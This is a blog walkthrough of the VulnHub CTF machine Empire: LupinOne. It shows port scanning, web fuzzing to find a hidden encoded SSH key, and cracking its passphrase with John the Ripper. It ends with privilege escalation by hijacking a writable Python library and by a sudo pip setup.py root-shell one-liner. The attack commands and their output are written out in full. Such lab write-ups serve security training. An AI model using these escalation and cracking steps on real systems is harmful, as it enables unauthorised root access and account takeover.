Empire: LupinOne || VulnHub Complete Walkthrough

Previously, we have completed a few single and series vulnerable boxes. If you have not yet read them, 

Click Here: https://www.technoscience.site/p/vulhub-vulnerable-by-design.html

Empire LupinOne is a vulnerable machine with difficulty level medium machine designed by icex64 and Empire Cybersecurity.

Settings Up

1. Firstly, we have to download the zip file from VulnHub. 
• Click here to Download
2. On completion, we have to extract the file. 
• 
3. Open Virtual Box, and then click on new. Fill in the name, type, and version
• 
4. Click Next and customize the memory size and then browse the existing virtual disk file.
• 
5. On completion, Check if the Network Adapter is set to Host-only adapter, or not.
• 
  
  
  
6. Once you are done with the settings up, let’s start the instance VMs.

Now, the instance is ready, and we have got a terminal screen that prompts us to input the password.

Enumeration

Our First step is to find out the target IP address using NetDiscover.

┌─[✗]─[mrdev@TS]─[~]

└──╼ $sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                               

                                                                                                                                   

 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 192.168.56.100  08:00:27:58:48:94      1      42  PCS Systemtechnik GmbH                                                          

 192.168.56.112  08:00:27:0b:fe:31      1      60  PCS Systemtechnik GmbH     

From the Scanning result, we have discovered our target IP address i.e., 192.168.56.112.

We have discovered the IP address, so let's perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:

• -sC: perform a script scan using the default set of scripts,
• -sV: enables version detection, which will detect what versions are running on what port.  

┌─[✗]─[mrdev@TS]─[~]

└──╼ $nmap -sC -sV 192.168.56.112

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 16:39 IST

Nmap scan report for 192.168.56.112

Host is up (0.056s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)

|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)

|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)

80/tcp open  http    Apache httpd 2.4.48 ((Debian))

|_http-title: Site doesn't have a title (text/html).

| http-robots.txt: 1 disallowed entry 

|_/~myfiles

|_http-server-header: Apache/2.4.48 (Debian)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds

┌─[mrdev@TS]─[~]

└──╼ $

From the Nmap output, we have spotted two open ports.

• Port 22/TCP running an SSH service, which means, that if we have a valid username, and password then will be easily accessed the server.
• Port 80/TCP runs an HTTP service, which indicates that there might be a website running. 

If you take a look at the below script, you will find out, that there is a robots.txt file disallowing a directory called /~my files on the webserver.

80/tcp open  http    Apache httpd 2.4.48 ((Debian))

|_http-title: Site doesn't have a title (text/html).

| http-robots.txt: 1 disallowed entry 

|_/~myfiles

|_http-server-header: Apache/2.4.48 (Debian)

Let’s look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

If you take a look at the robots.txt file, you can spot a file that disallowing from being crawling. Let’s visit this file.

We began the enumeration procedure by inspecting the (/~myfiles) HTTP page. From the output, we have discovered an Error 404, which seemed suspicious.

In the older version of the Apache server, the “~” tilde symbol was used to refer to the home directory of a user. 

However, this is not the case for newer versions. So, we can try to find out similar paths to start with the same symbol (~).

Let’s take a look at the page source code to find a clue to foothold the instance.

There is nothing else special from the page source, so move to further steps.

Foothold

Let’s find out the hidden directories, and files on the webserver that can also be categorized under fuzzing.   The tool we are going to use is FFUF (A fast web fuzzer). FFUF does not come pre-installed with Kali Linux, so we have to install them separately.

Install and Learn More: https://www.technoscience.site/2022/01/ffuf-fast-web-fuzzer-written-in-go.html

Let’s perform Fuzzing to find out hidden files and directories. 

• -c: colorize the output, 
• -u: set the Target URL, 
• -w: set the Wordlist file path.

┌─[mrdev@TS]─[~]

└──╼ $ffuf -c -u http://192.168.56.112/~FUZZ -w /usr/share/wordlists/dirb/common.txt 

        /'___\  /'___\           /'___\       

       /\ \__/ /\ \__/  __  __  /\ \__/       

       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      

        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      

         \ \_\   \ \_\  \ \____/  \ \_\       

          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3

________________________________________________

 :: Method           : GET

 :: URL              : http://192.168.56.112/~FUZZ

 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt

 :: Follow redirects : false

 :: Calibration      : false

 :: Timeout          : 10

 :: Threads          : 40

 :: Matcher          : Response status: 200,204,301,302,307,401,403,405

________________________________________________

secret                  [Status: 301, Size: 318, Words: 20, Lines: 10]

:: Progress: [4614/4614] :: Job [1/1] :: 1022 req/sec :: Duration: [0:00:11] :: Errors: 0 ::

┌─[mrdev@TS]─[~]

└──╼ $

The scan results identified ‘secret’ as a valid directory name from the server. So let us open this directory in the browser.

The page contained three major hints for the machine. 

1. The First hint is that there is a hidden file for the SSH private key.
2. Secondly, we have a wordlist that will help us to crack the SSH hashes. 
3. In the end, the hint also talks about the best friend, this is possibly a username.

So, our first task is to find out the hidden file which contains the SSH key. To find the secret private SSH key, we again use fuzzing with the help of FFUF once more.

Where we are going to use three new parameters. 

• -ic: ignore wordlist comments. 
• -fc: filter HTTP status codes from the response. 
• -e: specify the list of extensions.

┌─[mrdev@TS]─[~]

└──╼ $ffuf -c -ic -u http://192.168.56.112/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 403 -e .txt,.html

        /'___\  /'___\           /'___\       

       /\ \__/ /\ \__/  __  __  /\ \__/       

       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      

        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      

         \ \_\   \ \_\  \ \____/  \ \_\       

          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3

________________________________________________

 :: Method           : GET

 :: URL              : http://192.168.56.112/~secret/.FUZZ

 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

 :: Extensions       : .txt .html 

 :: Follow redirects : false

 :: Calibration      : false

 :: Timeout          : 10

 :: Threads          : 40

 :: Matcher          : Response status: 200,204,301,302,307,401,403,405

 :: Filter           : Response status: 403

________________________________________________

                        [Status: 200, Size: 331, Words: 52, Lines: 6]

                        [Status: 200, Size: 331, Words: 52, Lines: 6]

mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2]

:: Progress: [262953/262953] :: Job [1/1] :: 456 req/sec :: Duration: [0:09:29] :: Errors: 0 ::

┌─[mrdev@TS]─[~]

└──╼ $

After completing the scan, we identified one file that returned 200 responses from the server. So, let us open that file on the browser.

When we opened the file on the browser, it will redirect us to a new page that might contain some encoded message. We need to figure out the encryption type to decrypt the actual SSH key. 

Visit Cyberchef.

Learn More: https://www.technoscience.site/2021/01/cyberchef-cyber-swiss-army-knife.html

Paste the string in the input section and Drag and Drop each operation to recipe to match the encryption Type. After analyzing I find out that the string is encrypted with base 58.

The string was successfully decoded without any errors. We have identified an SSH private key, that can be used for SSH login on the target machine. 

Save the key into the file using the nano text editor.

┌─[mrdev@TS]─[~]

└──╼ $sudo nano ssh_key.rsa

[sudo] password for mrdev: 

Since the author has shared some hints related to the passphrase for SSH Key, thus we are going to use SSH2john to obtain the hash value of the SSH key. 

┌─[✗]─[mrdev@TS]─[~]

└──╼ $locate ssh2john

/usr/share/john/ssh2john.py

┌─[mrdev@TS]─[~]

└──╼ $/usr/share/john/ssh2john.py ssh_key.rsa > ssh_hash

┌─[mrdev@TS]─[~]

└──╼ $cat ssh_hash 

ssh_key.rsa:$sshng$2$16$f2df77361693c16003677b8a33deeb06$2486$6f70656e7373682d6b65792d7631000000000a6165733235362d636263000000066263727970740000001800000010f2df77361693c16003677b8a33deeb06000000100000000100000217000000077373682d727361000000030100010000020100c1cc78f325cbe4f465e2cada65813f73fe63fdd4da8e53d428030a29e493718447e6fe3e4a426763fc907bb10d61068b4e36fa9a01d9ac2be3982fd1fa3526f48cc6cc738b2816b0629e82c4931f3de01fcfa944ce0deb0c115fda2b6d9429e81dc2527d02b7fed58e3c57cea09334bac73a0a9ff131564029b1d8a6211bc686cbf864c98c6449132284c41b3eeb683ed01c31178aeb16974864877deb4190ab16c6454fb274c0a80bad7da99a83100baa38d8e40968d2c1cd3c4263a8d4d810d0102a15b913cbede25ad3f9d17c268eac8ccf7d9fcd35882efc395fd4299b5c4b02566943ef571b3eac1f58a19fde159e12bd16750844b937f93b20c80b051b83474b88acf891cb2461c0f31f4667683b268e862fdae2d52e2d7d8eb7e7a7fb55a0b6ca9b7f489a657a26e6e3e899a91d77b07b02a2bfacf59cd13c9a41cca58e4885ed1c2ddcafdf5e9b148f0efb7cb99b780f22151493bf02e67d1550e3d240cb31e7a77e07d1f66c5888da5a35f264c56b06b4a5f5dd701557664a2e5f79e5641d7f5e88a9ef52c7de43c8ed4edf3eccf91321483d621a10db119b39dbb58f5a8d085b8c70231429408735c98b82c667a9a368612297ef60e14ee98ed100a98bf5fb7c7c17ecee899b1574caffeba31ae1eea2c0f2ea9adceddd488519be087b5c5a5907fb527968294ca32ef33005b6f781161a9016d0029a0e3611a8610000075064b8515cb4008dae50f1375f34bdccea9975ecfa87dd1520e27a23612822dd4aa143b1200b69790b5fc0c50e9158db7eaa404d69a02f8b26c3c72584a964eaf47068ed5a932431c067cc3f6eca70a3859f628da3d8fef318ee6b4764d098f127a8580c585d3a0acb672effea55c8643be8a62ddc9d004fbc00d8e47768c324d28d4ba28ceecaf3ab07771730787be7305f810c8079e0fb2f2606fdbef3eb31af57165c6bf839ef6097c5749795b40ec3f011f00ae100fe1225136416857661109edfc5a1404a7847a93edf8b4afa452811a5406f053e21c858c8cf196ab4af1d5a44bc550f8803521c267f6fea5d290b41cd3939fd51ff264dd03dc1faf44272c7cfe0444fe095063acfa9c2eaea06e0090897e80ec59d2158926fd11d5282b73dd66055718c26b943c5441e5814c1c359b62667422f719b54c51b12936fee583599716e2d0ec90454f7edaea137e9fb66f5e27f9d60ec66837165b8e8e1c178e0f4c5d1653a53452c256ea60dc943928e974a308ae2d93cbebe2a401f0e2c140c6db08e11538e3a6f6bbbcf5ed5af8508a8443cfe8b7f0a0118264c92a74ea9499ab2dbc27949a1b7a6b5cfa9d74e2ce89a6672c7e96d83d73dc5f78ef2d835c5ab027a5d4196e22150ac060e42c278812c0f51d80c15dbf878e61dfc33462a67fed2ee34f2cd8c69f1f4ba5577b33bd858e4ea5972f0a5062fbcfde4702dc264a0a8846537e33988a941e4255a7ead33e7d541f2f6fda0c5069020b955045f2a5cef2a73e4d007bd4323d4cc00f2fa00ae4361e64a4253c4ce8ac68654a4309fbe7d3c4f1b74767ec29d3ac53c621c4ce70d8b6c731aedf00bb8e966f92771937ea91074b9c77abdf274e26713d37539a2afbebb25f1f2de8428449ae0b5dc70f18d8697e19c4720be2e9004c0604353e1d094a7501ee38eb923a82d6af2a44db847161f21e0b5cef9270128e5178b755fe164158f0fc65e7e6f14cad14349a804078d048fd8db0f91a81cc3c1c7c54938b850fb8ff1b9a6a2ac2eecf4e717e160d9797dc4d058cff64ab7404607cdc8b1cd70a99392a7566c4fba5eef362790da0a818ed47d040dcfa825cf7881f43965d813e2d19c6df95ba99eaaa401c3c8123f09f8f589585b7c31bf51b7ab1a9a6a81b6dc74f777129cb2ca7e5ea99200b689233625a671f90a66a8e1e050e23bfbab129186ca6501b6cbdbbe34797b6b864dc021689ac358740d15eb9b61a4bdbbc011ec31dec5c4b4f9cc1b8615c950057e0237ecc503adc2cef77a156f8a7fac71eaa8f34c3703359ecf9a745ed1123cc5c2be3fb6b66ad17164ae909ee5f0581f9f18c9f3bf83cba9dc3331712488eb746a49b93ad19de2622c01f22420a2bb599b452c41bccb8fd8b5ca2290e8e7a44506841b1ba22140354af66840ef4d9d3a34495cbb987cf31b5ee72b894c257a93c65d3cab6e8ecef76a7af317f5bdc600155a1fb7ec631a1717b783b114b1f37a63adc49dfadd3eb7f618850febdb3df461fab02dab3b96da09a2d4dc98fa88236f09a57fe796990431cb97a0b0f32ef099391a3b01877c250aed836032b3ca471b29f29453034e7d7780f25360984b0cee07f7eedd672f36e6691f2a76213e78a8294160a892b6cacc106913cb6a41d4caf88d5eab71caa29ce6a610326945d4cf9f4a31311187d76c8701859ee05d8c1a9465fbb97f2f93cccee5d87d5bd49b3b82f1948f274af7b31892560465d90194a22e4095a74f0f78ac6628dd92d53cf1aa85bb54e9c8de306f283dc8a505d2b1b4e0cf9581d3b0549946f1097975358cd71cf1003fde4893c70c07c30ec857049530fc057251057d88eb31ce87ee106b8fa8564f5996e2c1c5ebb6dab5601bb9794c77233bb2f862e6e25ee1363fbbbbee86d651f7a5b42f304348c0ad68b6eb1fc852dfc53fc36af7ae290fb9bf74f1d013cfe8878575353196ac3b0adc06cb93f32b81139283b21ce014bff08c1156e0be776c353eaf97fb33246e51290f8f48bae21acc9047937b3a4b25948497c3eaee02dcdf330b725e6e5ea2c5e54cdaf109599d9585ccbedf5a8ff343bff8a93d35459a96ccfee8ab76cae7815cdd4b2c524d45532f54ef36debcd554e636c97c3c01564a3aa0d1ce0bc19350079d2eebde57c758487947236188420a67ec034ae38a7a7a9cef519fbe0995394ca9613b68239dbb7e217ff6b4b73101f667797ea96330e40d4f53604290cb28d3ad0e204f4fe4a7c5ddab716e20158a2ea829f067461a8cdace12a560d977cc4f69f92d04f32037ded3ccb58cea98b43604be7c9b493e90d12fcbd31af1421c7562e1281307ae3e1d3007e77b900b9aa2ce3e6ddfc8a7dcb096b4f131195dde88a6f1b8cc6d0c6c3048b4ff0ca71941be74b10b095312a4b8cc9fbc3402f70ca16271f4ff89bd6a181a4f0cd015fc9fec36d3334fac5caae54d874c6063598ad29ea81d5bb14d87a43821dc7bae74855bb571bbe2765a2cf4debd2ad929200e8adf90cfa336640b89279b3b50496aacb96247614037e8011029b646acc1dc7ba3f26337f518ad446b4885e8e9b16ac391b4b35473214c4cf8b48c0780a934d414c3df8af279e97fe0e465b0289427ae9699150df44a15964782cd02708af2$16$614

┌─[mrdev@TS]─[~]

└──╼ $

Now, run john the ripper to crack the hash value. 

┌─[mrdev@TS]─[~]

└──╼ $john --wordlist=/usr/share/wordlists/fasttrack.txt ssh_hash 

Using default input encoding: UTF-8

Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes

Cost 2 (iteration count) is 16 for all loaded hashes

Will run 4 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press 'q' or Ctrl-C to abort, almost any other key for status

P@55w0rd!        (ssh_key.rsa)

P@55w0rd!        (ssh_key.rsa)

P@55w0rd!        (ssh_key.rsa)

3g 0:00:00:17 DONE (2022-02-10 19:14) 0.1690g/s 12.50p/s 12.50c/s 12.50C/s 2003..starwars

Session completed

┌─[mrdev@TS]─[~]

└──╼ $

From the output, we obtained a password. 

Now we have a username, and password, let's perform a secure shell connection to enable secure remote connections using the usernames and the relevant passwords.

┌─[✗]─[mrdev@TS]─[~]

└──╼ $ssh -i ssh_key.rsa icex64@192.168.56.112

Enter passphrase for key 'ssh_key.rsa':p@55w0rd!

Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

########################################

Welcome to Empire: Lupin One

########################################

Last login: Thu Oct  7 05:41:43 2021 from 192.168.26.4

icex64@LupinOne:~$ 

We successfully authenticated and got a secure shell. As it’s depicted now, we have accessed the user Icex64. Next, run the ls command to list the files and the directories contents. As a result, we found the user.txt. 

icex64@LupinOne:~$ cd /home

icex64@LupinOne:/home$ ls

arsene  icex64

icex64@LupinOne:~$ ls

user.txt

icex64@LupinOne:~$ cat user.txt 

    ...,    ,...    ..,.   .,,  *&@@@@@@@@@@&/.    ,,,.   .,..    ...,    ...,  

    ,,,.    .,,,    *&@@%%%%%%%%%%%%%%%%%%%%%%%%%%%&@,.   ..,,    ,,,,    ,,,.  

..,.    ,..,  (@&#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&%,.    ..,,    ,...    ..

    .... .@&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  ....    ....    ,...  

    .,#@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  .,..    ,.,.    ...,  

.,,,&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@#@.,    .,.,    .,..    .,

...@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&@####@*.    ..,,    ....    ,.

   @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@%#######@% .,.,    .,.,    .,.,  

..,,@@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@@@@@%#######@@,    ..,.    ,..,    ..

.,,, @@@@@@@@&%%%%%%%%%%%%%&@@@@@@@@@@@@@@@@@@@%%%#####@@,    .,,,    ,,.,    .,

    ..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%###@@ .,..    ...,    ....  

...,  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#&@.    ...,    ...,    ..

....   #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%@.    ....    ....    ..

    .,.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%#@*.,.,    .,.,    ..@@@@

..,.    .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#@@    ..,.    ,..*@&&@@.

.,,.    ,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%@@    .,,.    .@&&&@( ,,

    ,.,.  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%@@%%&@@@, ,,,@&@@@.,,,  

....    ...#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&%%%%&%,@%%%%%%%#@@@@@%..    ..

...,    ...,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&&&@,*,,@%%%%%%@@@&@%%@..    ..

    ,,.,    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/,***,*,@%%%@@&@@@%%###@ ,,.,  

    .,. @@&&&@@,,/@@@@@@@@@@@@@@@@@@@@@@@@#,,,,,,,,,*,,@%%%@&&@@%%%%%##&* ,...  

.,,, @@&@@&@&@@%,*,*,*,*,***,*,*,***,*,*,*,*,*,*,**,&@%%&@@@&@%%%%%%%%@/.,    .,

  /@@&&&&&&&&&&@@*,,,,,,,,,,,,,,,,,,,,,,*,,,**,%@&%%%%@&&&@%%%%%%%%%@(    ,..,  

 @&@&@&@&@&@&@&&@@@@@(,*,*,,**,*,*,,,*#&@@&%%%%%%%%&@@@@@%%%%%%%%@&..,    .,.,  

@@@&&&&&&&&&&&&&&&&&@@@&&&@@@@&&@@&&@&&&%&%%%%%%%@&&&@&%%%%%%&@,..    ...,    ..

 @&&&@&@&@&@&@&@&@&@&@&@&@&@&&@@@&&&&&&&%&%%%%&@&&@@%%%#&@%..,    .,.,    .,.,  

  @@@@&&&&&&&&&&&&&&&&&&&&&&@&&&&&&&&&&&%%&%@&@&@&@@%..   ....    ....    ,..,  

.,,, *@@&&&@&@&@&@&@&@&&&&&&&&&&&&&&&&&%&&@@&&@....    ,.,    .,,,    ,,..    .,

    ,,,,    .,%@@@@@@@@@@@@@@@@%,  ...,@@&&@(,,    ,,,.   .,,,    ,,.,    .,,.  

    .,.,    .,,,    .,,.   ..,.    ,*@@&&@ ,,,,    ,.,.   .,.,    .,.,    .,.,  

...,    ....    ....    ,..    ,..@@@&@#,..    ....    ,..    ...,    ....    ..

    ....    ....    ...    ....@.,%&@..    ....    ...    ....    ....    ....  

    ...,    ....    ....   .*/,...&.,,,    ....    ....   .,..    ...,    ...,  

.,.,    .,.,    ,,.,    .,../*,,&,,    ,.,,    ,.,,    ..,    .,.,    .,.,    ,,

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

icex64@LupinOne:~$ 

Since running shell is not have root permission, So, let’s identify further information about the target machine, which could be useful for gaining root access.

Privilege Escalation

Let's identify the rights, and privileges of the current user by executing the sudo -l command. 

icex64@LupinOne:~$ sudo -l

Matching Defaults entries for icex64 on LupinOne:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icex64 may run the following commands on LupinOne:

    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

icex64@LupinOne:~$

After analyzing the output, we confirm that the running python script may be vulnerable to the Python Library Hijacking approach. You find out more about this vulnerability by searching on google.

Let’s take a look at the contents of the python script.

icex64@LupinOne:~$ cat /home/arsene/heist.py

import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

icex64@LupinOne:~$

After analyzing the script we found a piece of important information.

If we execute this python script, it will call the web browser library and display the URL on the browser interface. 

What if we inject the bash shell script, and again execute the program to escalate the privilege.

So, we have to find out the location of the library using locate command.

icex64@LupinOne:~$ locate webbrowser

/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc

/usr/lib/python3.9/webbrowser.py

icex64@LupinOne:~$

From the output, we have obtained the location of the Python library of “webbrowser.py”.

We will now begin our Python Library Hijacking procedure. You will list the detail of the library if we have to change the read, and write permission.

icex64@LupinOne:~$ ls -al /usr/lib/python3.9/webbrowser.py

-rwxrwxrwx 1 root root 24110 Feb 10 08:54 /usr/lib/python3.9/webbrowser.py

icex64@LupinOne:~$

Now open the python script using nano command to edit the script. 

icex64@LupinOne:~$ nano /usr/lib/python3.9/webbrowser.py

Now add below script to call root shell.

os.system("/bin/bash")

Let’s execute the python script to switch the user to Arsene. 

icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

arsene@LupinOne:/home/icex64$

We are switched to the user arsene, but we don't have root privilege, so let's again identify the rights, and privileges of the current user Arsene.

arsene@LupinOne:/home/icex64$ sudo -l

Matching Defaults entries for arsene on LupinOne:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:

    (root) NOPASSWD: /usr/bin/pip

arsene@LupinOne:/home/icex64$

After analyzing the output, we spotted a new vulnerability that will help us to escalate the privilege. This is known as PIP Privilege Escalation. You will find out detailed information by searching on Google. 

Copy each of them, and paste them to the terminal one by one to get the root shell.

arsene@LupinOne:/home/icex64$ TF=$(mktemp -d)

arsene@LupinOne:/home/icex64$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

arsene@LupinOne:/home/icex64$ sudo pip install $TF

Processing /tmp/tmp.UqEhvH8ffJ

# whoami

root

#

Finally, we have the root shell and verify using the whoami command. It has been proven that it is the root, simply change the directory to the /root path to obtain the root flag.

# cd /root

# ls

root.txt

# cat root.txt

*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,                       .&&&&&&&&&(            /&&&&&&&&&                       

,                    &&&&&&*                          @&&&&&&                   

,                *&&&&&                                   &&&&&&                

,              &&&&&                                         &&&&&.             

,            &&&&                   ./#%@@&#,                   &&&&*           

,          &%&&          &&&&&&&&&&&**,**/&&(&&&&&&&&             &&&&          

,        &@(&        &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&&             &&&&        

,      .& &          &&&&&&&&&&&&&&&      &&.&&&&&&&&&&               &%&       

,     @& &           &&&&&&&&&&&&&&&      && &&&&&&&&&&                @&&&     

,    &%((            &&&&&&&&&&&&&&&      && &&&&&&&&&&                 #&&&    

,   &#/*             &&&&&&&&&&&&&&&      && #&&&&&&&&&(                 (&&&   

,  %@ &              &&&&&&&&&&&&&&&      && ,&&&&&&&&&&                  /*&/  

,  & &               &&&&&&&&&&&&&&&      &&* &&&&&&&&&&                   & &  

, & &                &&&&&&&&&&&&&&&,     &&& &&&&&&&&&&(                   &,@ 

,.& #                #&&&&&&&&&&&&&&(     &&&.&&&&&&&&&&&                   & & 

*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&             &(&

*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&            & &

*& *              &&&&&&&&&&&&&&&&&&&@.                 &&&&&&&&             @ &

*&              &&&&&&&&&&&&&&&&&&@    &&&&&/          &&&&&&                & &

*% .           &&&&&&&&&&&@&&&&&&&   &  &&(  #&&&&   &&&&.                   % &

*& *            &&&&&&&&&&   /*      @%&%&&&&&&&&    &&&&,                   @ &

*& &               &&&&&&&           & &&&&&&&&&&     @&&&                   & &

*& &                    &&&&&        /   /&&&&         &&&                   & @

*/(,                      &&                            &                   / &.

* & &                     &&&       #             &&&&&&      @             & &.

* .% &                    &&&%&     &    @&&&&&&&&&.   %@&&*               ( @, 

/  & %                   .&&&&  &@ @                 &/                    @ &  

*   & @                  &&&&&&    &&.               ,                    & &   

*    & &               &&&&&&&&&& &    &&&(          &                   & &    

,     & %           &&&&&&&&&&&&&&&(       .&&&&&&&  &                  & &     

,      & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&*          &  &                & &      

,       #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&        &.             %  &       

,         &  , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.     &&&&          @ &*        

,           & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.  /&&&&&&&&    & &@          

,             &  & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&@ &. &&            

,               && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&               

,                  &&  &( .&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&  &&                  

/                     ,&&(  &&%   *&&&&&&&&&&%   .&&&  /&&,                     

,                           &&&&&/...         .#&&&&#                           

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

See you on the next heist.

# 

Congratulation! On completion of the CTF challenge.